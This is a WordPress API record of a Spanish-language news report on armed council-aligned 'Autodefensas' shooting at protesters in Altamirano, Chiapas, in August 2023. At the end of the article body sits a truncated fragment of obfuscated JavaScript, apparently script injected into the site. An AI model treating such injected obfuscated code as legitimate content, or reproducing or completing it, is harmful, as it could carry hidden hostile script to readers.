{"id":11231,"date":"2023-08-09T05:24:58","date_gmt":"2023-08-09T05:24:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11231"},"modified":"2023-08-09T05:24:58","modified_gmt":"2023-08-09T05:24:58","slug":"grupo-armado-en-altamirano-agrede-a-la-poblacion-hay-una-persona-lesionada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11231","title":{"rendered":"Grupo armado en Altamirano, agrede a la poblaci\u00f3n, hay una persona lesionada"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"372\" height=\"512\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691558654322.jpg\" alt=\"\" class=\"wp-image-11232\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691558654322.jpg 372w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691558654322-218x300.jpg 218w\" sizes=\"auto, (max-width: 372px) 100vw, 372px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>08 de Agosto del 2023. Altamirano.- Un grupo de personas armadas y que son identificados por estar al servicio del Concejo Municipal de Altamirano, Chiapas, liderado por el s\u00edndico de aquel municipio, Gabriel Montoya Oseguera, dispar\u00f3 en contra de pobladores, cuando se manifestaban en calles de la cabecera municipal.<\/p>\n\n\n\n<p>Se supo que integrantes del Concejo municipal, acudieron a supervisar la construcci\u00f3n de una calle, y quien tras reclamos e intento de retenerlo, por personas identificadas como contrario al movimiento 14 de agosto, el grupo armado que acompa\u00f1a a los funcionarios, repelieron a la poblaci\u00f3n con disparos de armas de grueso calibre, el cual dej\u00f3 como saldo una persona con lesiones.<\/p>\n\n\n\n<p>Ha trascendido que la situaci\u00f3n en Altamirano hab\u00eda sido objeto de creciente preocupaci\u00f3n entre los habitantes y miembros del ejido, quienes esperaban una resoluci\u00f3n del Congreso Estatal ante la ferviente solicitud de destituci\u00f3n del concejo municipal, y el plazo establecido para una respuesta por parte del congreso venci\u00f3 sin que se emitiera una resoluci\u00f3n satisfactoria.<\/p>\n\n\n\n<p>Este martes, alrededor de 12:00 horas, un grupo se congreg\u00f3 pac\u00edficamente para exigir la destituci\u00f3n del concejo municipal en un acto de manifestaci\u00f3n, sin embargo, la protesta tom\u00f3 un giro violento cuando fueron agredidos por el grupo autodenominado &#8220;Autodefensas&#8221;, que est\u00e1 al servicio del s\u00edndico concejal.<\/p>\n\n\n\n<p>El municipio se encuentra actualmente sitiado, mientras la comunidad enfrenta los estragos de la violencia desencadenada por un concejo municipal que no ha logrado satisfacer las demandas y necesidades de sus habitantes. La tensi\u00f3n en Altamirano Chiapas se mantiene en un punto cr\u00edtico, y se espera que las autoridades tomen medidas inmediatas para restablecer la seguridad y la paz en la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 08 de Agosto del 2023. Altamirano.- Un grupo de personas armadas y que son identificados por estar al servicio del Concejo Municipal de Altamirano, Chiapas, liderado por el s\u00edndico de aquel municipio, Gabriel Montoya Oseguera, dispar\u00f3 en contra de pobladores, cuando se manifestaban en calles de la cabecera municipal. Se supo que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11232,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11231","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11231"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11231\/revisions"}],"predecessor-version":[{"id":11233,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11231\/revisions\/11233"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11232"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}